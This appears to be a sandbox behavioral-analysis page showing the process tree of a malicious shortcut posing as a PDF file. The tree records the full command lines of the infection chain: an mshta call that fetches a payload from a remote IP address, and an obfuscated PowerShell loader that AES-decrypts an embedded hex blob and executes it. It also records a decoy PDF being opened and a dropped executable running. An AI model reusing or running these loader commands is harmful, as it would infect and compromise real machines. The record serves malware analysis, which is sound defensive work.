| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "WkKUiuYYAeRIH" C:\Users\test22\AppData\Local\Temp\SetupPacket.pdf.lnk
1572
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://212.18.104.197/SetupPacket"
  2148
  - powershell.exe . mshta http://212.18.104.197/SetupPacket
    2232
    - mshta.exe "C:\Windows\system32\mshta.exe" http://212.18.104.197/SetupPacket
      2348
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function pgfjld($PGNrUcfE){return -split ($PGNrUcfE -replace '..', '0x$& ')};$KSZkdseY = pgfjld('BD984A0FC850BB44442AB135AD00799F795CFD9782453AD5D65AD8AC7511FF49D6DDDBC7D2B967E73CCFE2DBD48BC75AA261C7ACCD18C46967A73C81595FA81ABAC490F2F226E0251A513A4B21E66B2A6371DE32E243D9E1FCEEA18171DB485AA84154335973B76C09FFB7E823CAA4C1375575D0FEDEF352B4FCBC5473F6870A50F66D68AF3202EFB9BF7005FDB10135E712D570B5D6D0B7AAC5D11854E38181A9C470D177AC65A6954DE07D80DA0F6E83115F07461A9518778A968F10C5C931BD3594178DF5302D23589E14199DFA5181080383BD4D628FE9BE599155260F684C139F1D4F408F22CFF8AED6806BA3DA58371A40D3D2732A024CE5A6C931D63E55FDBD23AB9A57EA14D19EF63873994C5E444B43BC89DAC972500EA7BD2ECB3D2F81AF0D0EA29833CACEBDAE6B6B1D4E25B48D58588328BF188F29DBCB379A72E161066FD34621F72D68D5530F37C85A61B6AC673FDE6A01FF74B52C6998219D26D6DBBFC26293BBE6FDEF85F4A09824742858EEA1EB9CEECB8D81986F4166A8874DFD622FFD402AC6882AC4AD710A378C7168D6B2EA044323611D399C994ACF4603926DAF52C623CB16CAC1D7C16DB58B5FA1D31F7D8C2FB4480382E1FC23B5F9B5B66D573F90A9B258485299C2596FE82B36E3C7326CB52F66C6EAFC6D3EC454540970BE8C1CF87D605B2DBAFAF2D510A905A0BFB808FE75945350C83DB1818772DCF19D80538295F61D8E9D3533EA678C3F7D6E2DC324C9D730DB9E656868BB9B709552880B18262A46F7E94DB280B7FA058FDC076E752E7FF6661D9F09B9E53F175F2FD3C10B5D9188041FA5D6528660679C9FE79581222A6085EBE13A485BE1DE0A931A5E033DD0454B961EC6335C85040D6E4E2A52AAEF3E2CC86B0BEB51BF9FC90CE3CFD976A9B98CE872A8DA2CE6109CF1E5820DE57F4E8330C4E72455878508B3E5E66106BA62319AD62B4EEDCC3C0941E4E079D47796433B3A50DD0E37FA3D3C5098CD81EA9C9B88444E80EC5CBD3D013B194B9469DB44A4FCBDE1D3725078344CE1B3E662664F431F0995AB5FAC20FD2F3D4ECA9B9BC698488920884EC721EAD479726F1B066D93FD0964DA08B00D266DC7CFC23B886022E11553E9490BFE661AC4C595009695D3B528350460481543CB98715E4F835875914FE5AEBBA37F97D416B229EAFFD9632D85743AD504FF5F0A62BDDDA073A7B73FB9892606DA003F4FB0DA04B07FF8EFC54F1BE308CA1016E6FAA3309E00A5675411B212225C318DE27FE256671B0160FEF7400D7D8061919DC03ACEEEF58A642865B0787AEC57D4BD08971385313CF742DC639EC6B73F5C3E8CEC7C58E5E46D2CA19E8ED839E44D0D1C7EC63831699E034E4E168D4169B54E1401021A157055EED8152216E819ABF15CBAD706EA9EF845663DE3DD8780F0B7D5B9412ACFF1703134B29701021750F36342107190ECF305A42153FBB1112EC001A667060D19CF78C11E6556C1CCD1A7F928A485E07756716E4BB48772F16395960ACBA41B4CCFFD751EAC7058B9641FE34CA280A852F2C890536A55164615E7C78EACEAC039DAD58C2645D6FC6AFA9B1F0FDE4DA75160A4D11F2F69A7F7E36C2333DA9716CACAB0FB448B429689CB636FC54F37862D743C6A176E6C08956C6890E2E653A5A365E628F05310712F2E4D68F30EEE1B76FFAFC8B0148B386D496033F1D4B0A2F07C9D1CA3F587A3FD29AA491F720996C7FE6E230D2567EA102E9F66BFC765A3B009E1E001FCA56127D35681725C431A1726CEBFADE1FB20D62605846A83429E8A692E0C1C96BC9041876FBBF1B53A05A6BCFD234D7A5438A6072F4D472C5D17C5E0E853A023DA66B8B263B9794BDF8D8A61D609F9C1480BC7F7B2A0D3E097B26F3F476AAAB419D29CE99A04E9204EBAE2ED0F6F74');$dXtUn = [System.Security.Cryptography.Aes]::Create();$dXtUn.Key = pgfjld('74474F76576A4554674472586F625872');$dXtUn.IV = New-Object byte[] 16;$qwmdrLPB = $dXtUn.CreateDecryptor();$kWgRZUeAP = $qwmdrLPB.TransformFinalBlock($KSZkdseY, 0, $KSZkdseY.Length);$FsJGITdVz = [System.Text.Encoding]::Utf8.GetString($kWgRZUeAP);$qwmdrLPB.Dispose();& $FsJGITdVz.Substring(0,3) $FsJGITdVz.Substring(3)
        2496
        
        AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf"
        2648
        
        AdeptTranslatorPro_[3MB]_[1sig].exe "C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe"
        2248
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents